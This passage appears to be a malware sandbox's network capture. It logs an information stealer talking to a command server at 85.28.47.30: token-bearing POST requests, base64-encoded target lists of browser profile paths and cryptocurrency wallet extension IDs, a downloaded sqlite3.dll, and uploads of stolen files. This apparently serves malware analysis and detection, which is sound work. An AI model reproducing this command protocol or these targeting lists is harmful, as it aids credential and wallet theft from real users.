                                                                Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="message"browsers------IEBAAFCAFCBKFHJJJKKF--
                                                                Jul 5, 2024 04:23:09.136487961 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:09 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 1520
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                Jul 5, 2024 04:23:09.136502028 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                Jul 5, 2024 04:23:09.137711048 CEST465OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAE
                                                                Host: 85.28.47.30
                                                                Content-Length: 267
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 2d 2d 0d 0a
                                                                Data Ascii: ------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="message"plugins------EBAKKFHJDBKKEBFHDAAE--
                                                                Jul 5, 2024 04:23:09.331840038 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:09 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 5416
                                                                Keep-Alive: timeout=5, max=98
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                Jul 5, 2024 04:23:09.331876993 CEST224INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdk
                                                                Jul 5, 2024 04:23:09.331887007 CEST1236INData Raw: 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 4e 76 62 43 6c 38 59 32 35 74 59 57
                                                                Data Ascii: b2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2x
                                                                Jul 5, 2024 04:23:09.331962109 CEST224INData Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d
                                                                Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxH
                                                                Jul 5, 2024 04:23:09.331974983 CEST1236INData Raw: 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57 52 76 62 6d 56 6a 59 57 4a 6c 61 47 46 73 62 57 4a 6e 63 47 5a 76 5a 47 70 74 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 72 61 6d 31 76 62 32
                                                                Data Ascii: b2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB8MHxPbmVLZXl8am5tYm9iam1obG5nb2VmYWlvamZsamNraWxoaGxoY2p8MXw
                                                                Jul 5, 2024 04:23:09.332000971 CEST1236INData Raw: 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d 68 6e 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 74 69 59 57 6c 38 4d 58 77 77 66 44 42 38 51 58 56 30 61 48 6c 38 5a 32
                                                                Data Ascii: fEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmh
                                                                Jul 5, 2024 04:23:09.332010984 CEST252INData Raw: 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47
                                                                Data Ascii: amlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXw
                                                                Jul 5, 2024 04:23:09.334145069 CEST466OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB
                                                                Host: 85.28.47.30
                                                                Content-Length: 268
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a
                                                                Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="message"fplugins------GIEHIDHJDBFIIECAKECB--
                                                                Jul 5, 2024 04:23:09.524148941 CEST335INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:09 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 108
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                Jul 5, 2024 04:23:09.544255018 CEST199OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFI
                                                                Host: 85.28.47.30
                                                                Content-Length: 6711
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:09.544307947 CEST6711OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63
                                                                Data Ascii: ------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                Jul 5, 2024 04:23:10.430039883 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:09 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=96
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:23:10.430613995 CEST90OUTGET /69934896f997d5bb/sqlite3.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:10.615165949 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:10 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                ETag: "10e436-5e7eeebed8d80"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1106998
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                Jul 5, 2024 04:23:10.615180969 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                Data Ascii: #N@B/81s:<R@B/92P @B
                                                                Jul 5, 2024 04:23:10.615194082 CEST1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                Jul 5, 2024 04:23:11.845906973 CEST199OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAEC
                                                                Host: 85.28.47.30
                                                                Content-Length: 4599
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:12.675211906 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:11 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=94
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:23:12.759167910 CEST199OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGD
                                                                Host: 85.28.47.30
                                                                Content-Length: 1451
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:13.423636913 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:12 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=93
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:23:13.490577936 CEST557OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAE
                                                                Host: 85.28.47.30
                                                                Content-Length: 359
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 [TRUNCATED]
                                                                Data Ascii: ------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="file"------HDBKFHIJKJKECAAAECAE--
                                                                Jul 5, 2024 04:23:14.147173882 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:13 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=92
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:23:14.451788902 CEST557OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID
                                                                Host: 85.28.47.30
                                                                Content-Length: 359
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 